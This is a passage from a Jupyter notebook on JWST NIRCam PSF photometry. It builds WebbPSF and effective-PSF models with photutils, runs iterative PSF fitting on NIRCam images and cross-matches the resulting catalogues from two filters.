"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n\n image = fits.open(dict_images[det][filt]['images'][0])\n data_sb = image[1].data\n\n ax = plt.subplot(1, len(filts_short), i + 1)\n\n plt.xlabel(\"X [px]\", fontdict=font2)\n plt.ylabel(\"Y [px]\", fontdict=font2)\n plt.title(filt, fontdict=font2)\n norm = simple_norm(data_sb, 'sqrt', percent=99.)\n\n ax.imshow(data_sb, norm=norm, cmap='Greys')\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Create the PSF models",
"_____no_output_____"
],
[
"## I. Create the PSF model using WebbPSF\n\nWe create a dictionary that contains the PSF created using WebbPSF for the detectors and filters selected above.",
"_____no_output_____"
]
],
[
[
"dict_psfs_webbpsf = {}\n\nfor det in dets_short:\n dict_psfs_webbpsf.setdefault(det, {})\n for j, filt in enumerate(filts_short):\n dict_psfs_webbpsf[det].setdefault(filt, {})\n\n dict_psfs_webbpsf[det][filt]['psf model grid'] = None\n dict_psfs_webbpsf[det][filt]['psf model single'] = None",
"_____no_output_____"
]
],
[
[
"The function below allows to create a single PSF or a grid of PSFs and allows to save the PSF as a fits file. The model PSF are stored by default in the psf dictionary. For the grid of PSFs, users can select the number of PSFs to be created. The PSF can be created detector sampled or oversampled (the oversample can be changed inside the function).\n\n**Note**: The default source spectrum is, if `pysynphot` is installed, a G2V star spectrum from Castelli & Kurucz (2004). Without `pysynphot`, the default is a simple flat spectrum such that the same number of photons are detected at each wavelength.",
"_____no_output_____"
]
],
[
[
"def create_psf_model(fov=11, create_grid=False, num=9, save_psf=False, detsampled=False):\n\n nrc = webbpsf.NIRCam()\n\n nrc.detector = det \n nrc.filter = filt\n\n src = webbpsf.specFromSpectralType('G5V', catalog='phoenix')\n if detsampled:\n print(\"Creating a detector sampled PSF\")\n aa = 'detector sampled'\n fov = 21\n else:\n print(\"Creating a oversampled PSF\")\n aa = 'oversampled'\n fov = fov\n\n print(\"Using a {field}\".format(field=fov), \"px fov\")\n\n if create_grid:\n print(\"\")\n print(\"Creating a grid of PSF for filter {filt} and detector {det}\".format(filt=filt, det=det))\n print(\"\")\n num = num\n\n if save_psf:\n\n outname = \"./PSF_%s_samp4_G5V_fov%d_npsfs%d.fits\" % (filt, fov, num)\n nrc.psf_grid(num_psfs=num, oversample=4, source=src, all_detectors=False, fov_pixels=fov,\n save=True, outfile=outname, use_detsampled_psf=detsampled)\n else:\n grid_psf = nrc.psf_grid(num_psfs=num, oversample=4, source=src, all_detectors=False,\n fov_pixels=fov, use_detsampled_psf=detsampled)\n dict_psfs_webbpsf[det][filt]['psf model grid'] = grid_psf\n else:\n print(\"\")\n print(\"Creating a single PSF for filter {filt} and detector {det}\".format(filt=filt, det=det))\n print(\"\")\n num = 1\n if save_psf:\n outname = \"./PSF_%s_samp4_G5V_fov%d_npsfs%d.fits\" % (filt, fov, num)\n nrc.psf_grid(num_psfs=num, oversample=4, source=src, all_detectors=False, fov_pixels=fov,\n save=True, outfile=outname, use_detsampled_psf=detsampled)\n else:\n single_psf = nrc.psf_grid(num_psfs=num, oversample=4, source=src, all_detectors=False,\n fov_pixels=fov, use_detsampled_psf=detsampled)\n dict_psfs_webbpsf[det][filt]['psf model single'] = single_psf\n\n return ",
"_____no_output_____"
]
],
[
[
"### Single PSF model",
"_____no_output_____"
]
],
[
[
"for det in dets_short:\n for filt in filts_short:\n create_psf_model(fov=11, num=25, create_grid=False, save_psf=False, detsampled=False)",
"_____no_output_____"
]
],
[
[
"## Display the single PSF models",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n ax = plt.subplot(1, 2, i + 1)\n\n norm_epsf = simple_norm(dict_psfs_webbpsf[det][filt]['psf model single'].data[0], 'log', percent=99.)\n ax.set_title(filt, fontsize=40)\n ax.imshow(dict_psfs_webbpsf[det][filt]['psf model single'].data[0], norm=norm_epsf)\n ax.set_xlabel('X [px]', fontsize=30)\n ax.set_ylabel('Y [px]', fontsize=30)\nplt.tight_layout()",
"_____no_output_____"
]
],
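[
[
"# Illustrative inspection (not part of the original workflow) of the object\n# returned by WebbPSF, a photutils GriddedPSFModel; the attribute names below\n# assume that interface\nsingle_psf_model = dict_psfs_webbpsf['NRCB1']['F115W']['psf model single']\nprint(single_psf_model.data.shape)     # (1, fov*oversample, fov*oversample) for a single PSF\nprint(single_psf_model.grid_xypos)     # detector position(s) at which the PSF was computed\nprint(single_psf_model.oversampling)   # oversampling factor used to build the model",
"_____no_output_____"
]
],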
[
[
"### PSF grid",
"_____no_output_____"
]
],
[
[
"for det in dets_short:\n for filt in filts_short:\n create_psf_model(fov=11, num=25, create_grid=True, save_psf=False, detsampled=False)",
"_____no_output_____"
]
],
[
[
"## Display the PSFs grid\n\nWe show for 1 filter (**F115W**) the grid of PSFs and the difference from the mean",
"_____no_output_____"
]
],
[
[
"webbpsf.gridded_library.display_psf_grid(dict_psfs_webbpsf[dets_short[0]][filts_short[0]]['psf model grid'],\n zoom_in=False, figsize=(14, 14))",
"_____no_output_____"
]
],
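[
[
"# Minimal sketch (assumes the photutils GriddedPSFModel.evaluate interface):\n# interpolate the grid to obtain the PSF at an arbitrary detector position\n# (x_0, y_0), which is the operation the PSF-fitting photometry relies on\npsf_grid_model = dict_psfs_webbpsf['NRCB1']['F115W']['psf model grid']\nyy, xx = np.mgrid[0:25, 0:25]\npsf_at_pos = psf_grid_model.evaluate(x=xx, y=yy, flux=1.0, x_0=12, y_0=12)\nplt.imshow(psf_at_pos, norm=simple_norm(psf_at_pos, 'log', percent=99.))",
"_____no_output_____"
]
],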
[
[
"## II. Create the PSF model building an Effective PSF (ePSF)\n\nMore information on the PhotUtils Effective PSF can be found [here](https://photutils.readthedocs.io/en/stable/epsf.html).\n\n* Select the stars from the images we want to use for building the PSF. We use the [DAOStarFinder](https://photutils.readthedocs.io/en/stable/api/photutils.detection.DAOStarFinder.html) function to find bright stars in the images (setting a high detection threshold). [DAOStarFinder](https://photutils.readthedocs.io/en/stable/api/photutils.detection.DAOStarFinder.html#photutils.detection.DAOStarFinder) detects stars in an image using the DAOFIND ([Stetson 1987](https://ui.adsabs.harvard.edu/abs/1987PASP...99..191S/abstract)) algorithm. DAOFIND searches images for local density maxima that have a peak amplitude greater than `threshold` (approximately; threshold is applied to a convolved image) and have a size and shape similar to the defined 2D Gaussian kernel. \\\n **Note**: The threshold and the maximum distance to the closest neighbour depend on the user science case (i.e.; number of stars in the field of view, crowding, number of bright sources, minimum number of stars required to build the ePSF, etc.) and must be modified accordingly. \n* Build the effective PSF (excluding objects for which the bounding box exceed the detector edge) using [EPSBuilder](https://photutils.readthedocs.io/en/stable/api/photutils.psf.EPSFBuilder.html#photutils.psf.EPSFBuilder) function.",
"_____no_output_____"
],
[
"We create a dictionary that contains the effective PSF for the detectors and filters selected above.",
"_____no_output_____"
]
],
[
[
"dict_psfs_epsf = {}\n\nfor det in dets_short:\n dict_psfs_epsf.setdefault(det, {})\n for j, filt in enumerate(filts_short):\n dict_psfs_epsf[det].setdefault(filt, {})\n\n dict_psfs_epsf[det][filt]['table psf stars'] = {}\n dict_psfs_epsf[det][filt]['epsf single'] = {}\n dict_psfs_epsf[det][filt]['epsf grid'] = {}\n\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n\n dict_psfs_epsf[det][filt]['table psf stars'][i + 1] = None\n dict_psfs_epsf[det][filt]['epsf single'][i + 1] = None\n dict_psfs_epsf[det][filt]['epsf grid'][i + 1] = None",
"_____no_output_____"
]
],
[
[
"Note that the unit of the Level-2 and Level-3 Images from the pipeline is MJy/sr (hence a surface brightness). The actual unit of the image can be checked from the header keyword **BUNIT**. The scalar conversion constant is copied to the header keyword **PHOTMJSR**, which gives the conversion from DN/s to megaJy/steradian. For our analysis we revert back to DN/s.",
"_____no_output_____"
]
],
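[
[
"As a minimal, self-contained illustration of this conversion (equivalent to what the finding function below does internally, using the dictionaries already defined above):\n\n```python\nfrom astropy.io import fits\n\n# inspect the first image of the first SW filter\nwith fits.open(dict_images[dets_short[0]][filts_short[0]]['images'][0]) as hdul:\n    imh = hdul[1].header\n    data_dn_s = hdul[1].data / imh['PHOTMJSR']  # MJy/sr -> DN/s\n    print(imh['BUNIT'], 'converted to DN/s with PHOTMJSR =', imh['PHOTMJSR'])\n```",
"_____no_output_____"
]
],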
[
[
"def find_stars_epsf(det='NRCA1', filt='F070W', dist_sel=False):\n\n bkgrms = MADStdBackgroundRMS()\n mmm_bkg = MMMBackground()\n\n image = fits.open(dict_images[det][filt]['images'][i])\n data_sb = image[1].data\n imh = image[1].header\n\n print(\"Finding PSF stars on image {number} of filter {f}, detector {d}\".format(number=i + 1, f=filt, d=det))\n\n data = data_sb / imh['PHOTMJSR']\n print(\"Conversion factor from {units} to DN/s for filter {f}:\".format(units=imh['BUNIT'], f=filt), imh['PHOTMJSR'])\n\n sigma_psf = dict_utils[filt]['psf fwhm']\n\n print(\"FWHM for the filter {f}:\".format(f=filt), sigma_psf, \"px\")\n\n std = bkgrms(data)\n bkg = mmm_bkg(data)\n daofind = DAOStarFinder(threshold=th[j] * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n\n psf_stars = daofind(data)\n dict_psfs_epsf[det][filt]['table psf stars'][i + 1] = psf_stars\n \n if dist_sel:\n\n print(\"\")\n print(\"Calculating closest neigbhour distance\")\n\n d = []\n\n daofind_tot = DAOStarFinder(threshold=10 * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n\n stars_tot = daofind_tot(data)\n\n x_tot = stars_tot['xcentroid']\n y_tot = stars_tot['ycentroid']\n\n for xx, yy in zip(psf_stars['xcentroid'], psf_stars['ycentroid']):\n\n sep = []\n dist = np.sqrt((x_tot - xx)**2 + (y_tot - yy)**2)\n sep = np.sort(dist)[1:2][0]\n d.append(sep)\n\n psf_stars['min distance'] = d\n mask_dist = (psf_stars['min distance'] > min_sep[j])\n\n psf_stars = psf_stars[mask_dist]\n\n dict_psfs_epsf[det][filt]['table psf stars'][i + 1] = psf_stars\n\n print(\"Minimum distance required:\", min_sep[j], \"px\")\n print(\"\")\n print(\"Number of isolated sources found in the image used to build ePSF for {f}:\".format(f=filt), len(psf_stars))\n print(\"-----------------------------------------------------\")\n print(\"\")\n else:\n print(\"\")\n print(\"Number of sources used to build ePSF for {f}:\".format(f=filt), len(psf_stars))\n print(\"--------------------------------------------\")\n print(\"\")",
"_____no_output_____"
],
[
"tic = time.perf_counter()\n\nth = [700, 500] # threshold level for the two filters (length must match number of filters analyzed)\nmin_sep = [10, 10] # minimum separation acceptable for ePSF stars from closest neighbour\n\nfor det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n\n find_stars_epsf(det=det, filt=filt, dist_sel=False)\n\ntoc = time.perf_counter()\n\nprint(\"Elapsed Time for finding stars:\", toc - tic)",
"_____no_output_____"
]
],
[
[
"### II. Build Effective PSF",
"_____no_output_____"
]
],
[
[
"def build_epsf(det='NRCA1', filt='F070W'):\n \n mmm_bkg = MMMBackground()\n \n image = fits.open(dict_images[det][filt]['images'][i])\n data_sb = image[1].data\n imh = image[1].header\n\n data = data_sb / imh['PHOTMJSR']\n\n hsize = (sizes[j] - 1) / 2\n\n x = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['xcentroid']\n y = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['ycentroid']\n mask = ((x > hsize) & (x < (data.shape[1] - 1 - hsize)) & (y > hsize) & (y < (data.shape[0] - 1 - hsize)))\n\n stars_tbl = Table()\n stars_tbl['x'] = x[mask]\n stars_tbl['y'] = y[mask]\n\n bkg = mmm_bkg(data)\n\n data_bkgsub = data.copy()\n\n data_bkgsub -= bkg\n\n nddata = NDData(data=data_bkgsub)\n stars = extract_stars(nddata, stars_tbl, size=sizes[j])\n\n print(\"Creating ePSF for image {number} of filter {f}, detector {d}\".format(number=i + 1, f=filt, d=det))\n\n epsf_builder = EPSFBuilder(oversampling=oversample, maxiters=3, progress_bar=False)\n\n epsf, fitted_stars = epsf_builder(stars)\n dict_psfs_epsf[det][filt]['epsf single'][i + 1] = epsf",
"_____no_output_____"
]
],
[
[
"**Note**: here we limit the maximum number of iterations to 3 (to limit it’s run time), but in practice one should use about 10 or more iterations.",
"_____no_output_____"
]
],
[
[
"tic = time.perf_counter()\n\nsizes = [11, 11] # size of the cutout (extract region) for each PSF star - must match number of filters analyzed\noversample = 4\n\nfor det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n build_epsf(det=det, filt=filt)\n\ntoc = time.perf_counter()\n\nprint(\"Time to build the Effective PSF:\", toc - tic) ",
"_____no_output_____"
]
],
[
[
"## Display the ePSFs \n\nWe display only 1 ePSF for each filter",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n ax = plt.subplot(1, 2, i + 1)\n\n norm_epsf = simple_norm(dict_psfs_epsf[det][filt]['epsf single'][i + 1].data, 'log', percent=99.)\n plt.title(filt, fontsize=30)\n ax.imshow(dict_psfs_epsf[det][filt]['epsf single'][i + 1].data, norm=norm_epsf)",
"_____no_output_____"
]
],
[
[
"## Work in Progress - Build a grid of effective PSF\n\nTwo functions:\n* count PSF stars in the grid \n* create a gridded ePSF\n\nThe purpose of the first function is to count how many good PSF stars are in each sub-region defined by the grid number N. The function should start from the number provided by the user and iterate until the minimum grid size 2x2. Depending on the number of PSF stars that the users want in each cell of the grid, they can choose the appropriate grid size or modify the threshold values for the stars detection, selected when creating the single ePSF (in the **Finding stars** cell above).\n\nThe second function creates a grid of PSFs with EPSFBuilder. The function will return a a GriddedEPSFModel object containing a 3D array of N × n × n. The 3D array represents the N number of 2D n × n ePSFs created. It should include a grid_xypos key which will state the position of the PSF on the detector for each of the PSFs. The order of the tuples in grid_xypos refers to the number the PSF is in the 3D array.",
"_____no_output_____"
],
[
"### I. Counting PSF stars in each region of the grid",
"_____no_output_____"
]
],
[
[
"def count_PSFstars_grid(grid_points=5, size=15, min_numpsf=40):\n\n num_grid_calc = np.arange(2, grid_points + 1, 1)\n num_grid_calc = num_grid_calc[::-1]\n\n for num in num_grid_calc:\n print(\"Calculating the number of PSF stars in a %d x %d grid:\" % (num, num))\n print(\"\")\n\n image = fits.open(dict_images[det][filt]['images'][i])\n data_sb = image[1].data\n\n points = np.int16((data_sb.shape[0] / num) / 2)\n x_center = np.arange(points, 2 * points * (num), 2 * points)\n y_center = np.arange(points, 2 * points * (num), 2 * points)\n\n centers = np.array(np.meshgrid(x_center, y_center)).T.reshape(-1, 2)\n\n for n, val in enumerate(centers):\n\n x = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['xcentroid']\n y = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['ycentroid']\n flux = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['flux']\n\n half_size = (size - 1) / 2\n\n lim1 = val[0] - points + half_size\n lim2 = val[0] + points - half_size\n lim3 = val[1] - points + half_size\n lim4 = val[1] + points - half_size\n\n test = (x > lim1) & (x < lim2) & (y > lim3) & (y < lim4)\n\n # if np.count_nonzero(test) < min_numpsf:\n # raise ValueError(\"Not enough PSF stars in all the cells (> %d): Decrease your grid size or the minimum number of PSF stars in each cell or change parameters in the finder\" %(min_numpsf))\n if np.count_nonzero(test) < min_numpsf:\n print(\"Center Coordinates of grid cell %d are (%d, %d) --- Not enough PSF stars in the cell (number of PSF stars < %d)\" % (i + 1, val[0], val[1], min_numpsf))\n\n else:\n print(\"Center Coordinate of grid cell %d are (%d, %d) --- Number of PSF stars:\" % (n + 1, val[0], val[1]), np.count_nonzero(test)) \n print(\"\")",
"_____no_output_____"
],
[
"for det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n\n print(\"Analyzing image {number} of filter {f}, detector {d} \".format(number=i + 1, f=filt, d=det))\n print(\"\")\n\n count_PSFstars_grid(grid_points=5, size=15, min_numpsf=40)",
"_____no_output_____"
]
],
[
[
"## TODO - Create a grid of ePSF",
"_____no_output_____"
],
[
"Here goes the function that creates a grid of ePSF that can be saved in the epsf dictionary.",
"_____no_output_____"
],
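[
"A minimal sketch of how such a grid could be assembled with photutils, assuming the per-cell ePSFs built with `EPSFBuilder` are collected in a (hypothetical) list `epsfs` — all with the same shape and oversampling `oversample` — and that `grid_xypos` holds the corresponding cell-center detector positions arranged in a rectangular grid:\n\n```python\nimport numpy as np\nfrom astropy.nddata import NDData\nfrom photutils.psf import GriddedPSFModel\n\n# Stack the individual ePSFs into an (N, n, n) cube\npsf_cube = np.stack([e.data for e in epsfs])\n\nmeta = {'grid_xypos': grid_xypos,   # [(x1, y1), (x2, y2), ...] on the detector\n        'oversampling': oversample}\n\nepsf_grid = GriddedPSFModel(NDData(psf_cube, meta=meta))\n```",
"_____no_output_____"
],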
[
"## TODO - Use the ePSF grid to perturbate the WebbPSF model",
"_____no_output_____"
],
[
"Here goes the function that create a grid of PSF models obtained perturbating the WebbPSF PSF models using the ePSF grid created above.",
"_____no_output_____"
],
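[
"A purely conceptual sketch of one possible perturbation scheme, assuming hypothetical aligned (N, n, n) arrays `webb_cube` and `epsf_cube` of WebbPSF PSFs and ePSFs sampled at the same positions, shape, and oversampling (none of these arrays exist yet in this notebook):\n\n```python\nimport numpy as np\n\ndef perturb_grid(webb_cube, epsf_cube, alpha=1.0):\n    # new PSF = WebbPSF + alpha * (ePSF - WebbPSF), renormalized to unit sum\n    pert = webb_cube + alpha * (epsf_cube - webb_cube)\n    pert /= pert.sum(axis=(1, 2), keepdims=True)\n    return pert\n```\n\nWith `alpha=1` this simply replaces the synthetic model with the empirical ePSF; intermediate values blend the two.",
"_____no_output_____"
],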
[
"## Perform PSF photometry\n\nWe perform the PSF photometry on the images, saving by default the output catalogs and the residual images in the dictionary created below. It is also possible to save the output catalogs (pickles pandas object) and residual images (fits files) in the current directory using the parameters `save_output` and `save_residuals`. ",
"_____no_output_____"
]
],
[
[
"dict_phot = {}\n\nfor det in dets_short:\n dict_phot.setdefault(det, {})\n for j, filt in enumerate(filts_short):\n dict_phot[det].setdefault(filt, {})\n\n dict_phot[det][filt]['residual images'] = {}\n dict_phot[det][filt]['output photometry tables'] = {}\n\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n\n dict_phot[det][filt]['residual images'][i + 1] = None\n dict_phot[det][filt]['output photometry tables'][i + 1] = None",
"_____no_output_____"
]
],
[
[
"**Note**: since performing the PSF photometry on the images takes some time (for the 8 images in this example ~ 4 hours), to speed up the notebook, we use a high threshold in the finding algorithm (threshold ~ 2000) and we will use in the analyis below the catalogs obtained with a sigma threshold = 10 from a previous reduction run. To perform a meaningful data reduction, the user should modify the threshold accordingly. \n\nHere we use as PSF model the grid of WebbPSF PSFs, but the users can change the model and use the others available (i.e., single WebbPSF PSF, single ePSF) modifying the `psf` parameter in the function.",
"_____no_output_____"
]
],
[
[
"def psf_phot(det='NRCA1', filt='F070W', th=2000, psf='grid_webbpsf', save_residuals=False, save_output=False):\n\n bkgrms = MADStdBackgroundRMS()\n mmm_bkg = MMMBackground()\n fitter = LevMarLSQFitter()\n\n im = fits.open(dict_images[det][filt]['images'][i])\n imh = im[1].header\n data_sb = im[1].data\n\n d = im[0].header['DETECTOR']\n prim_dith_pos = im[0].header['PATT_NUM']\n prim_dith_num = im[0].header['NUMDTHPT']\n subpx_dith_pos = im[0].header['SUBPXNUM']\n subpx_dith_num = im[0].header['SUBPXPNS']\n\n data = data_sb / imh['PHOTMJSR']\n\n print(\"Conversion factor from {units} to DN/s for filter {f}:\".format(units=imh['BUNIT'], f=filt), imh['PHOTMJSR'])\n print(\"Applying conversion to the data\")\n \n sigma_psf = dict_utils[filt]['psf fwhm']\n print(\"FWHM for the filter {f}:\".format(f=filt), sigma_psf)\n \n std = bkgrms(data)\n bkg = mmm_bkg(data)\n \n daofind = DAOStarFinder(threshold=th * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n \n daogroup = DAOGroup(5.0 * sigma_psf)\n \n # grid PSF\n\n if psf == 'grid_webbpsf':\n print(\"Using as PSF model WebbPSF PSFs grid\")\n psf_model = dict_psfs_webbpsf[det][filt]['psf model grid'].copy()\n\n # single psf:\n\n if psf == 'single_webbpsf':\n print(\"Using as PSF model WebbPSF single PSF\")\n psf_model = dict_psfs_webbpsf[det][filt]['psf model single'].copy()\n\n # epsf:\n\n if psf == 'single_epsf':\n print(\"Using as PSF model single ePSF\")\n psf_model = dict_psfs_epsf[det][filt]['epsf single'][i + 1].copy()\n\n print(\"Performing the photometry on image {number} of filter {f}, detector {d}\".format(number=i + 1, f=filt, d=det))\n \n tic = time.perf_counter()\n \n phot = IterativelySubtractedPSFPhotometry(finder=daofind, group_maker=daogroup,\n bkg_estimator=mmm_bkg, psf_model=psf_model,\n fitter=LevMarLSQFitter(),\n niters=2, fitshape=(11, 11), aperture_radius=ap_radius[j])\n result = phot(data)\n \n toc = time.perf_counter()\n \n print(\"Time needed to perform photometry on image {number}:\".format(number=i + 1), \"%.2f\" % ((toc - tic) / 3600), \"hours\")\n print(\"Number of sources detected in image {number} for filter {f}:\".format(number=i + 1, f=filt), len(result))\n \n residual_image = phot.get_residual_image()\n \n dict_phot[det][filt]['residual images'][i + 1] = residual_image\n dict_phot[det][filt]['output photometry tables'][i + 1] = result\n\n # save the residual images as fits file:\n\n if save_residuals:\n hdu = fits.PrimaryHDU(residual_image)\n hdul = fits.HDUList([hdu])\n residual_outname = 'residual_%s_%s_webbPSF_gridPSF_%dof%d_%dof%d.fits' % (d, filt, prim_dith_pos, prim_dith_num, subpx_dith_pos, subpx_dith_num)\n\n dir_output_phot = './'\n\n hdul.writeto(os.path.join(dir_output_phot, residual_outname))\n\n outname = 'phot_%s_%s_webbPSF_gridPSF_level2_%dof%d_%dof%d.pkl' % (d, filt, prim_dith_pos, prim_dith_num, subpx_dith_pos, subpx_dith_num)\n\n # save the output photometry Tables\n\n if save_output:\n tab = result.to_pandas()\n tab.to_pickle(os.path.join(dir_output_phot, outname))",
"_____no_output_____"
],
[
"tic_tot = time.perf_counter()\n\nap_radius = [3.0, 3.5] # must match the number of filters analyzed\n\nif glob.glob('./*residual*.fits'):\n print(\"Deleting Residual images from directory\")\n files = glob.glob('./residual*.fits')\n for file in files:\n os.remove(file)\n\nfor det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n \n psf_phot(det=det, filt=filt, th=2000, psf='grid_webbpsf', save_residuals=True, save_output=False) \n\ntoc_tot = time.perf_counter()\nprint(\"Time elapsed to perform the photometry of the {number} images:\".format(number=(len(filts_short) * len(dict_images[det][filt]['images']))), \"%.2f\" % ((toc_tot - tic_tot) / 3600), \"hours\") ",
"_____no_output_____"
]
],
[
[
"## Output Photometry Table\n\n\n### Note for developer: \n\nIt would be really useful, if PhotUtils can provide some diagnostics to identify the quality of the photometry in the final catalog for each source (similarly to all the other PSF photometry programs available).",
"_____no_output_____"
]
],
[
[
"dict_phot['NRCB1']['F115W']['output photometry tables'][1]",
"_____no_output_____"
]
],
[
[
"## Display subtracted image\n\nAs an example, we show the comparison between one science image and the residual image after the data reduction for both filters. Note that the residual image is obtained from the photometry run in the cell above with a very high detection threshold.",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n\n image = fits.open(dict_images[det][filt]['images'][0])\n data_sb = image[1].data\n\n ax = plt.subplot(2, len(filts_short), i + 1)\n\n plt.xlabel(\"X [px]\", fontdict=font2)\n plt.ylabel(\"Y [px]\", fontdict=font2)\n plt.title(filt, fontdict=font2)\n norm = simple_norm(data_sb, 'sqrt', percent=99.)\n\n ax.imshow(data_sb, norm=norm, cmap='Greys')\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n\n res = dict_phot[det][filt]['residual images'][1]\n\n ax = plt.subplot(2, len(filts_short), i + 3)\n\n plt.xlabel(\"X [px]\", fontdict=font2)\n plt.ylabel(\"Y [px]\", fontdict=font2)\n norm = simple_norm(data_sb, 'sqrt', percent=99.)\n\n ax.imshow(res, norm=norm, cmap='Greys')\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Part II - Data Analysis",
"_____no_output_____"
],
[
"**Note**: here we use the reduction obtained using a grid of WebbPSF PSFs as PSF models. The users can perform the data analysis using different PSF models (single PSF model, PSF grid, etc.) and compare the results. ",
"_____no_output_____"
],
[
"## Load Tables with PSF Photometry",
"_____no_output_____"
]
],
[
[
"if not glob.glob('./*phot*gridPSF*.pkl'):\n\n print(\"Downloading Photometry Output\")\n\n boxlink_cat_f115w = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/phot_cat_F115W.tar.gz'\n boxfile_cat_f115w = './phot_cat_F115W.tar.gz'\n urllib.request.urlretrieve(boxlink_cat_f115w, boxfile_cat_f115w)\n\n tar = tarfile.open(boxfile_cat_f115w, 'r')\n tar.extractall()\n\n boxlink_cat_f200w = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/phot_cat_F200W.tar.gz'\n boxfile_cat_f200w = './phot_cat_F200W.tar.gz'\n urllib.request.urlretrieve(boxlink_cat_f200w, boxfile_cat_f200w)\n\n tar = tarfile.open(boxfile_cat_f200w, 'r')\n tar.extractall()\n\n cat_dir = './'\n phots_pkl_f115w = sorted(glob.glob(os.path.join(cat_dir, '*F115W*gridPSF*.pkl')))\n phots_pkl_f200w = sorted(glob.glob(os.path.join(cat_dir, '*F200W*gridPSF*.pkl'))) \n\nelse:\n\n cat_dir = './'\n phots_pkl_f115w = sorted(glob.glob(os.path.join(cat_dir, '*F115W*gridPSF*.pkl')))\n phots_pkl_f200w = sorted(glob.glob(os.path.join(cat_dir, '*F200W*gridPSF*.pkl'))) \n\nresults_f115w = []\nresults_f200w = []\n\nfor phot_pkl_f115w, phot_pkl_f200w in zip(phots_pkl_f115w, phots_pkl_f200w):\n\n ph_f115w = pd.read_pickle(phot_pkl_f115w)\n ph_f200w = pd.read_pickle(phot_pkl_f200w)\n\n result_f115w = QTable.from_pandas(ph_f115w)\n result_f200w = QTable.from_pandas(ph_f200w)\n\n results_f115w.append(result_f115w)\n results_f200w.append(result_f200w)",
"_____no_output_____"
]
],
[
[
"## Transform the images to DataModel\n\nIn order to assign the WCS coordinate and hence cross-match the images, we need to transform the images to DataModel. The coordinates are assigned during the step [assign_wcs](https://jwst-pipeline.readthedocs.io/en/stable/jwst/assign_wcs/main.html?#using-the-wcs-interactively) step in the JWST pipeline and allow us to cross-match the different catalogs obtained for each filter.",
"_____no_output_____"
]
],
[
[
"images_f115w = []\nimages_f200w = []\n\nfor i in np.arange(0, len(dict_images['NRCB1']['F115W']['images']), 1):\n\n image_f115w = ImageModel(dict_images['NRCB1']['F115W']['images'][i])\n images_f115w.append(image_f115w)\n \nfor i in np.arange(0, len(dict_images['NRCB1']['F200W']['images']), 1):\n\n image_f200w = ImageModel(dict_images['NRCB1']['F200W']['images'][i])\n images_f200w.append(image_f200w)",
"_____no_output_____"
]
],
[
[
"## Cross-match the catalogs from the two filters for the 4 images\n\nWe cross-match the catalogs to obtain the single color-magnitude diagrams.\n\nStars from the two filters are associated if the distance between the matches is < 0.5 px. ",
"_____no_output_____"
]
],
[
[
"results_clean_f115w = []\nresults_clean_f200w = []\n\nfor i in np.arange(0, len(images_f115w), 1):\n\n mask_f115w = ((results_f115w[i]['x_fit'] > 0) & (results_f115w[i]['x_fit'] < 2048) &\n (results_f115w[i]['y_fit'] > 0) & (results_f115w[i]['y_fit'] < 2048) &\n (results_f115w[i]['flux_fit'] > 0))\n\n result_clean_f115w = results_f115w[i][mask_f115w]\n\n ra_f115w, dec_f115w = images_f115w[i].meta.wcs(result_clean_f115w['x_fit'], result_clean_f115w['y_fit'])\n radec_f115w = SkyCoord(ra_f115w, dec_f115w, unit='deg')\n result_clean_f115w['radec'] = radec_f115w\n results_clean_f115w.append(result_clean_f115w)\n\n mask_f200w = ((results_f200w[i]['x_fit'] > 0) & (results_f200w[i]['x_fit'] < 2048) &\n (results_f200w[i]['y_fit'] > 0) & (results_f200w[i]['y_fit'] < 2048) &\n (results_f200w[i]['flux_fit'] > 0))\n\n result_clean_f200w = results_f200w[i][mask_f200w]\n\n ra_f200w, dec_f200w = images_f200w[i].meta.wcs(result_clean_f200w['x_fit'], result_clean_f200w['y_fit'])\n radec_f200w = SkyCoord(ra_f200w, dec_f200w, unit='deg')\n\n result_clean_f200w['radec'] = radec_f200w\n results_clean_f200w.append(result_clean_f200w)",
"_____no_output_____"
],
[
